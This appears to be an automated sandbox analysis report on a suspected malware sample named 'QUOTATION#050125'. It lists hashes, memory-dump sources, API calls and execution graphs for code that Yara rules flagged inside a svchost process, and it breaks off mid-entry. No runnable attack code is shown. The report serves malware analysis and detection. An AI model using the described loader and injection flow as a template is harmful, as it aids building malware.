                                                                                      • Opcode ID: bb0a4b263bd1f94c1ab6597c5797734549a94ebdea0d5f6888f685b8c736f158
                                                                                      • Instruction ID: cc353d65736244ba903f87a252715e13502367cb71728f32843b77112e07f335
                                                                                      • Opcode Fuzzy Hash: bb0a4b263bd1f94c1ab6597c5797734549a94ebdea0d5f6888f685b8c736f158
                                                                                      • Instruction Fuzzy Hash: 13D05E72500328ABDA20ABA4AC4EFCB7A7CDB04751F0002A1B655E6491EAB09A84CBD0
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: LocalTime
                                                                                      • String ID: %.3d$X64
                                                                                      • API String ID: 481472006-1077770165
                                                                                      • Opcode ID: 0d8d623c6b9dd0b18be798a3fc7de17b52d25feff83a3d294fed470b0952ee59
                                                                                      • Instruction ID: eb8bce1e9d741ea56f71f1d972f71fec7e4d409eb0fa8694b2249e15763d7e85
                                                                                      • Opcode Fuzzy Hash: 0d8d623c6b9dd0b18be798a3fc7de17b52d25feff83a3d294fed470b0952ee59
                                                                                      • Instruction Fuzzy Hash: 8AD01261808219E9CB5C96D0EC459F9B37CFB19341F618473F81791040E734D5886B62
                                                                                      APIs
                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0015232C
                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0015233F
                                                                                        • Part of subcall function 0012E97B: Sleep.KERNEL32 ref: 0012E9F3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                      • String ID: Shell_TrayWnd
                                                                                      • API String ID: 529655941-2988720461
                                                                                      • Opcode ID: 1935afc4de01c3fdccfe32bc1e980a891f704fc0e011dea36defebf1d46fa746
                                                                                      • Instruction ID: 424b2878ce6d68d5f28f374a3464f64698d356b7b3d6766036641e7a4be95276
                                                                                      • Opcode Fuzzy Hash: 1935afc4de01c3fdccfe32bc1e980a891f704fc0e011dea36defebf1d46fa746
                                                                                      • Instruction Fuzzy Hash: 07D0C976394310BAE668BB70AC1FFC67A549B10B15F0049167645AA1D0DAA0A8818A94
                                                                                      APIs
                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0015236C
                                                                                      • PostMessageW.USER32(00000000), ref: 00152373
                                                                                        • Part of subcall function 0012E97B: Sleep.KERNEL32 ref: 0012E9F3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                      • String ID: Shell_TrayWnd
                                                                                      • API String ID: 529655941-2988720461
                                                                                      • Opcode ID: a9f7162eb8017c5aecdb6bd7b56444f46da331ef866de92bcd4859ca1594ba94
                                                                                      • Instruction ID: 3665c2c9e7e03b31a58c0e280893813c81cebe220cc8f8a6cc2793fe9b8246c7
                                                                                      • Opcode Fuzzy Hash: a9f7162eb8017c5aecdb6bd7b56444f46da331ef866de92bcd4859ca1594ba94
                                                                                      • Instruction Fuzzy Hash: 88D0C9723D1310BEE668BB70AC1FFC676549B14B15F4049167645AA1D0DAA0A8818A94
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 000FBE93
                                                                                      • GetLastError.KERNEL32 ref: 000FBEA1
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000FBEFC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1717984340-0
                                                                                      • Opcode ID: 7ea89eafef56f0bd70ae3cc4e3c041059ac361ccd8ce3e2a506c416288021723
                                                                                      • Instruction ID: 0404d657a9bc5467b117c5579d690e834103ce724a262660a2ed0071fd0dcaa7
                                                                                      • Opcode Fuzzy Hash: 7ea89eafef56f0bd70ae3cc4e3c041059ac361ccd8ce3e2a506c416288021723
                                                                                      • Instruction Fuzzy Hash: 4641C13460420AEFCB718F65CC44ABA7BE5EF41320F294169FA599B5A2DB318D04EF60

                                                                                      Execution Graph

                                                                                      Execution Coverage:1.2%
                                                                                      Dynamic/Decrypted Code Coverage:5%
                                                                                      Signature Coverage:7.9%
                                                                                      Total number of Nodes:139
                                                                                      Total number of Limit Nodes:10
execution_graph 90136 42c063 90137 42c07d 90136->90137 90140 3872d10 LdrInitializeThunk 90137->90140 90138 42c0a1 90140->90138 90141 4250c3 90145 4250dc 90141->90145 90142 425127 90149 42eaf3 90142->90149 90145->90142 90146 425164 90145->90146 90148 425169 90145->90148 90147 42eaf3 RtlFreeHeap 90146->90147 90147->90148 90152 42cd83 90149->90152 90151 425134 90153 42cda0 90152->90153 90154 42cdad RtlFreeHeap 90153->90154 90154->90151 90173 424d33 90174 424d4f 90173->90174 90175 424d77 90174->90175 90176 424d8b 90174->90176 90177 42ca33 NtClose 90175->90177 90178 42ca33 NtClose 90176->90178 90179 424d80 90177->90179 90180 424d94 90178->90180 90183 42ec13 RtlAllocateHeap 90180->90183 90182 424d9f 90183->90182 90184 42ebd3 90187 42cd43 90184->90187 90186 42ebee 90188 42cd5d 90187->90188 90189 42cd6a RtlAllocateHeap 90188->90189 90189->90186 90190 42fbf3 90191 42eaf3 RtlFreeHeap 90190->90191 90192 42fc08 90191->90192 90155 414303 90156 41430c 90155->90156 90161 417ad3 90156->90161 90158 41433b 90159 414380 90158->90159 90160 41436f PostThreadMessageW 90158->90160 90160->90159 90162 417af7 90161->90162 90163 417afe 90162->90163 90164 417b36 LdrLoadDll 90162->90164 90163->90158 90164->90163 90165 41b5e3 90166 41b627 90165->90166 90168 41b648 90166->90168 90169 42ca33 90166->90169 90170 42ca4d 90169->90170 90171 42ca5a NtClose 90170->90171 90171->90168 90193 41a893 90194 41a8ab 90193->90194 90196 41a905 90193->90196 90194->90196 90197 41e7f3 90194->90197 90198 41e819 90197->90198 90202 41e910 90198->90202 90203 42fc33 RtlAllocateHeap RtlFreeHeap 90198->90203 90200 41e8ae 90200->90202 90204 42c0b3 90200->90204 90202->90196 90203->90200 90205 42c0d0 90204->90205 90208 3872b2a 90205->90208 90206 42c0f8 90206->90202 90209 3872b31 90208->90209 90210 3872b3f LdrInitializeThunk 90208->90210 90209->90206 90210->90206 90172 3872a80 LdrInitializeThunk 90211 419098 90212 42ca33 NtClose 90211->90212 90213 4190a2 90212->90213 90214 401b9d 90215 401bc7 90214->90215 90218 430063 90215->90218 90221 42e6a3 90218->90221 90222 42e6c9 90221->90222 90233 407463 90222->90233 90224 42e6df 90232 401c11 90224->90232 90236 41b3f3 90224->90236 90226 42e713 90247 428603 90226->90247 90227 42e6fe 90227->90226 90251 42cdd3 90227->90251 90230 42e72d 90231 42cdd3 ExitProcess 90230->90231 90231->90232 90235 407470 90233->90235 90254 416793 90233->90254 90235->90224 90237 41b41f 90236->90237 90265 41b2e3 90237->90265 90240 41b44c 90241 42ca33 NtClose 90240->90241 90244 41b457 90240->90244 90241->90244 90242 41b480 90242->90227 90243 41b464 90243->90242 90245 42ca33 NtClose 90243->90245 90244->90227 90246 41b476 90245->90246 90246->90227 90248 428665 90247->90248 90250 428672 90248->90250 90276 418943 90248->90276 90250->90230 90252 42cdf0 90251->90252 90253 42ce01 ExitProcess 90252->90253 90253->90226 90255 4167b0 90254->90255 90257 4167c5 90255->90257 90258 42d483 90255->90258 90257->90235 90259 42d49d 90258->90259 90260 42d4cc 90259->90260 90261 42c0b3 LdrInitializeThunk 90259->90261 90260->90257 90262 42d528 90261->90262 90263 42eaf3 RtlFreeHeap 90262->90263 90264 42d541 90263->90264 90264->90257 90266 41b3d9 90265->90266 90267 41b2fd 90265->90267 90266->90240 90266->90243 90271 42c153 90267->90271 90270 42ca33 NtClose 90270->90266 90272 42c170 90271->90272 90275 38734e0 LdrInitializeThunk 90272->90275 90273 41b3cd 90273->90270 90275->90273 90278 41896d 90276->90278 90277 418e7b 90277->90250 90278->90277 90284 413f73 90278->90284 90280 418a9a 90280->90277 90281 42eaf3 RtlFreeHeap 90280->90281 90282 418ab2 90281->90282 90282->90277 90283 42cdd3 ExitProcess 90282->90283 90283->90277 90288 413f93 90284->90288 90286 413ffc 90286->90280 90288->90286 90289 41b703 90288->90289 90290 41b728 90289->90290 90296 429da3 90290->90296 90292 41b759 90293 413ff2 90292->90293 90295 42eaf3 RtlFreeHeap 90292->90295 90301 41b543 LdrInitializeThunk 90292->90301 90293->90280 90295->90292 90298 429e08 90296->90298 90297 429e3b 90297->90292 90298->90297 90302 413dd3 90298->90302 90300 429e1d 90300->90292 90301->90292 90303 413da0 90302->90303 90304 413e0d 90302->90304 90303->90304 90307 42ccb3 90303->90307 90304->90300 90308 42cccd 90307->90308 90311 3872b90 LdrInitializeThunk 90308->90311 90309 413db5 90309->90300 90311->90309

Control-flow Graph
control_flow_graph 207 417ad3-417aef 208 417af7-417afc 207->208 209 417af2 call 42f6d3 207->209 210 417b02-417b10 call 42fcd3 208->210 211 417afe-417b01 208->211 209->208 214 417b20-417b31 call 42e173 210->214 215 417b12-417b1d call 42ff73 210->215 220 417b33-417b47 LdrLoadDll 214->220 221 417b4a-417b4d 214->221 215->214 220->221
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B45
Memory Dump Source
• Source File: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
• Instruction ID: 683b89875a7fb83d71da6e1f8a97b79be180c124f2fa609aa3b8b71e39b295bb
• Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
• Instruction Fuzzy Hash: F7011EB5E4420DBBDB10DAA5DC42FDEB378AB54308F4041AAE90897240F635EB588B95

Control-flow Graph
control_flow_graph 233 42ca33-42ca68 call 404803 call 42dc73 NtClose
APIs
• NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CA63
Memory Dump Source
• Source File: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 66657d5b165b02af58b5b66cdb422c5b63c672e050058a705595915231ac49b7
• Instruction ID: 50a5b69ca1682e878e5a40afd65bd8ed1634e2dbd60f648430f8de340d975e9a
• Opcode Fuzzy Hash: 66657d5b165b02af58b5b66cdb422c5b63c672e050058a705595915231ac49b7
• Instruction Fuzzy Hash: B5E08C763402147BE720FB5AEC42F9B776CDFC5710F10852AFA08A7281C6B4B90186F8

Control-flow Graph
control_flow_graph 248 3872b90-3872b9c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: ed489058d7c0c3d223a2fe8c5d1c888034d2db14b4b083cf77c01dbae813c4db
• Instruction ID: 6f7dc9dc84e8267195c912612bde4f32e2718c40121fee52bd86356cd656078c
• Opcode Fuzzy Hash: ed489058d7c0c3d223a2fe8c5d1c888034d2db14b4b083cf77c01dbae813c4db
• Instruction Fuzzy Hash: EC90023120108C42D510B398850474A000587D0301F95CC55A5418658DC7A588957121

Control-flow Graph
control_flow_graph 247 3872a80-3872a8c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 36150536791fb470b700a19735b0ef8889d0b3534bfa97eb93ac220b61bd68bf
• Instruction ID: b38caf5e8dc87ec186c855554552f9d8c3db2fb34d0ad267353d4d155fa7d434
• Opcode Fuzzy Hash: 36150536791fb470b700a19735b0ef8889d0b3534bfa97eb93ac220b61bd68bf
• Instruction Fuzzy Hash: 88900261202004434505B3984514616400A87E0301B91C865E2008590DC63588957125

Control-flow Graph
control_flow_graph 249 3872d10-3872d1c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 2f39fca1e5092a39af1b5e9e79c2792af02c729bb85a4434d84eca5581254394
• Instruction ID: 43c2b848878c6a37c832f1e18684ad143e5fbedf7fd05c4b5cba2b09e15accde
• Opcode Fuzzy Hash: 2f39fca1e5092a39af1b5e9e79c2792af02c729bb85a4434d84eca5581254394
• Instruction Fuzzy Hash: 3490023120100853D511B3984604707000987D0341FD1CC56A1418558DD7668956B121

APIs
Memory Dump Source
• Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: d445b3def86bb8bd8944004d2bf67ea4084fe8294ba4a465fb1fe19188c6138b
• Instruction ID: 3ced9c95db0e51830220f90e1158efc3a8ccfa86b0017126a78b7821b8bd8874
• Opcode Fuzzy Hash: d445b3def86bb8bd8944004d2bf67ea4084fe8294ba4a465fb1fe19188c6138b
• Instruction Fuzzy Hash: 0990023160510842D500B3984614706100587D0301FA1CC55A1418568DC7A5895575A2

Control-flow Graph
APIs
• PostThreadMessageW.USER32(b427-I_1,00000111,00000000,00000000), ref: 0041437A
Strings
Memory Dump Source
• Source File: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: b427-I_1$b427-I_1
• API String ID: 1836367815-3731361855
• Opcode ID: e31239851aee85a2536cf6da61f787cff518875e27f6edfaa8e2894a84858e00
• Instruction ID: 1c1b804c52c0fa2fc79735cf8757f94194e925b2cf622f9804a62bf2283c9d4a
• Opcode Fuzzy Hash: e31239851aee85a2536cf6da61f787cff518875e27f6edfaa8e2894a84858e00
• Instruction Fuzzy Hash: 4001A5B2D4111CBAEB119AD19D82DEFBB7CDF40398F00816AFA1467141D6784E468BA5

Control-flow Graph
APIs
• PostThreadMessageW.USER32(b427-I_1,00000111,00000000,00000000), ref: 0041437A
Strings
Memory Dump Source
• Source File: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: b427-I_1$b427-I_1
• API String ID: 1836367815-3731361855
• Opcode ID: c2470579c8be65e49bfd338019fbf368160fbece63dc37d02d7ce0922c0166ce
• Instruction ID: 66382633165677f4d287f1c9305a2e0242bca7fee9ac24ed2ff299bc6a34d21b
• Opcode Fuzzy Hash: c2470579c8be65e49bfd338019fbf368160fbece63dc37d02d7ce0922c0166ce
• Instruction Fuzzy Hash: 9401D6B2E4021CBADB10AAE19C82DEFBB7CDF40798F008169FA1467141D6785E068BB5

Control-flow Graph
APIs
• PostThreadMessageW.USER32(b427-I_1,00000111,00000000,00000000), ref: 0041437A
Strings
Memory Dump Source
• Source File: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: b427-I_1$b427-I_1
• API String ID: 1836367815-3731361855
• Opcode ID: 0c78152fe7af9bfe9666a3fbd71234cde2823069974fff51629e0b809ca46a0d
• Instruction ID: e66581b55692d0f67d3645e7f83c5c9d5bac99b1c31a45c43741cea5d306e683
• Opcode Fuzzy Hash: 0c78152fe7af9bfe9666a3fbd71234cde2823069974fff51629e0b809ca46a0d
• Instruction Fuzzy Hash: C301B5B2E4021CBADB119BD19C81DEFBB7CDF80398F00816AFA2467141D67C4E468BA5

Control-flow Graph
control_flow_graph 193 417b83-417b87 194 417b89-417ba2 193->194 195 417b6f 193->195 198 417ba4-417be0 194->198 199 417b5f-417b62 194->199 196 417b71-417b7f 195->196 197 417b36-417b47 LdrLoadDll 195->197 203 417b81-417b82 196->203 204 417bfd-417c19 196->204 201 417b4a-417b4d 197->201 205 417be2-417bf3 198->205 206 417bf4-417c19 198->206 205->206
Memory Dump Source
• Source File: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4e7030420652704376b12194149c07a63f315160b8825ddd380f325685b21786
• Instruction ID: 5fe7b0e3159e894076f386ae4157a7bafd75539a6ed586e2fa135baba6e0e4fa
• Opcode Fuzzy Hash: 4e7030420652704376b12194149c07a63f315160b8825ddd380f325685b21786
• Instruction Fuzzy Hash: 7E21683192D2449FDB21CA75C9866E4BB74FB9A725F1406CBD091CF242D335AC8AC784

Control-flow Graph
control_flow_graph 223 42cd43-42cd80 call 404803 call 42dc73 RtlAllocateHeap
APIs
• RtlAllocateHeap.NTDLL(?,0041E8AE,?,?,00000000,?,0041E8AE,?,?,?), ref: 0042CD7B
Memory Dump Source
• Source File: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 27af925cc09fa346fafd11b2d7a9bc6e46addc919f118a8ecb37a125f7b6b630
• Instruction ID: f9903ddc43aa1d478041010c95bd812e84ae6d930a69b2ca5004dc81876241ec
• Opcode Fuzzy Hash: 27af925cc09fa346fafd11b2d7a9bc6e46addc919f118a8ecb37a125f7b6b630
• Instruction Fuzzy Hash: F3E092B1200204BBD710EF49EC41F9B77ACEFC5750F108419FD08A7241D670B910CAB8

Control-flow Graph
control_flow_graph 228 42cd83-42cdc3 call 404803 call 42dc73 RtlFreeHeap
APIs
• RtlFreeHeap.NTDLL(00000000,00000004,00000000,0B05C6C1,00000007,00000000,00000004,00000000,00417355,000000F4), ref: 0042CDBE
Memory Dump Source
• Source File: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 3ae13e125d1d646a9bdf0d6dc878b17524a9d002341fa1517782c7adab021431
• Instruction ID: 9d094757069ee7fafe8343a4ae1169e8157d0d769102895cf672c55cae1e0208
• Opcode Fuzzy Hash: 3ae13e125d1d646a9bdf0d6dc878b17524a9d002341fa1517782c7adab021431
• Instruction Fuzzy Hash: 7AE092B52002147BDB10EE4ADC41F9B33ACEFC5710F004419FD08A7241C6B0B9108AB8

Control-flow Graph

control_flow_graph 238 42cdd3-42ce0f call 404803 call 42dc73 ExitProcess
APIs
• ExitProcess.KERNEL32(?,00000000,00000000,?,3D88789B,?,?,3D88789B), ref: 0042CE0A
Memory Dump Source
• Source File: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0

Control-flow Graph

control_flow_graph 243 3872b2a-3872b2f 244 3872b31-3872b38 243->244 245 3872b3f-3872b46 LdrInitializeThunk 243->245
APIs
Memory Dump Source
• Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bbe82d3ff695159af61276f39ba4b2f4f7465d71e517e60d0a559fe6a6577c16
                                                                                      • Instruction ID: dd94b74388c5c2ecf4838e753e7b995a3c960d93ee88ae587df8a73e63349882
                                                                                      • Opcode Fuzzy Hash: bbe82d3ff695159af61276f39ba4b2f4f7465d71e517e60d0a559fe6a6577c16
                                                                                      • Instruction Fuzzy Hash: F090023120140842D500B3984908747000587D0302F91C855A6158555EC775C8957531
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b0ecea67ef2c8e81f2745c2f21829f50b9920a8013c0c146b7d17805bfeb6948
                                                                                      • Instruction ID: 8a5008b35022df5e7d89723315a3511b97195f732020ae7014c0ad131391daa7
                                                                                      • Opcode Fuzzy Hash: b0ecea67ef2c8e81f2745c2f21829f50b9920a8013c0c146b7d17805bfeb6948
                                                                                      • Instruction Fuzzy Hash: CD900221601004824540B3A889449064005ABE1311791C965A198C550DC66988696665
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fe24c39286ccc32e7df04e6c6fa9b77b339e5b930973574063cc5f4688669982
                                                                                      • Instruction ID: 1cac316c68fe66ceab03ae767d3ecefac7db3d6d6d99756933bbc6cdcbfd7c3c
                                                                                      • Opcode Fuzzy Hash: fe24c39286ccc32e7df04e6c6fa9b77b339e5b930973574063cc5f4688669982
                                                                                      • Instruction Fuzzy Hash: CF90026120140843D540B7984904607000587D0302F91C855A3058555ECB398C557135
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6af8d28e62cc504ca2cabd9edb1e3683778e4ff664dc35e2be30f917f93ed942
                                                                                      • Instruction ID: c64a1089009a8f555e4b3f4bbd64ba7f5aeb918f0e7e9c2613b8babed66bba1d
                                                                                      • Opcode Fuzzy Hash: 6af8d28e62cc504ca2cabd9edb1e3683778e4ff664dc35e2be30f917f93ed942
                                                                                      • Instruction Fuzzy Hash: B590026134100882D500B3984514B060005C7E1301F91C859E2058554DC729CC567126
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3c5d5dff34b3ec718a8cb662c8a6d8082b9bd46803079387bdbeca25cdd27bd4
                                                                                      • Instruction ID: 3bff10a881135723f5ed1fdbed86059d98cca0510777929e08e5e9b886cfbdf3
                                                                                      • Opcode Fuzzy Hash: 3c5d5dff34b3ec718a8cb662c8a6d8082b9bd46803079387bdbeca25cdd27bd4
                                                                                      • Instruction Fuzzy Hash: 5A90022160100942D501B3984504616000A87D0341FD1C866A2018555ECB358996B131
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0bc9b95f4b0f4d17010a13c00e3a5a5854e1a7b81e218c8a7e7fc0640925ac57
                                                                                      • Instruction ID: e96b61b20236f0a040ef6253d5d1fd8710ec58e162c5a474c4ef5fc519dea198
                                                                                      • Opcode Fuzzy Hash: 0bc9b95f4b0f4d17010a13c00e3a5a5854e1a7b81e218c8a7e7fc0640925ac57
                                                                                      • Instruction Fuzzy Hash: 9F90027120100842D540B3984504746000587D0301F91C855A6058554EC7698DD97665
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
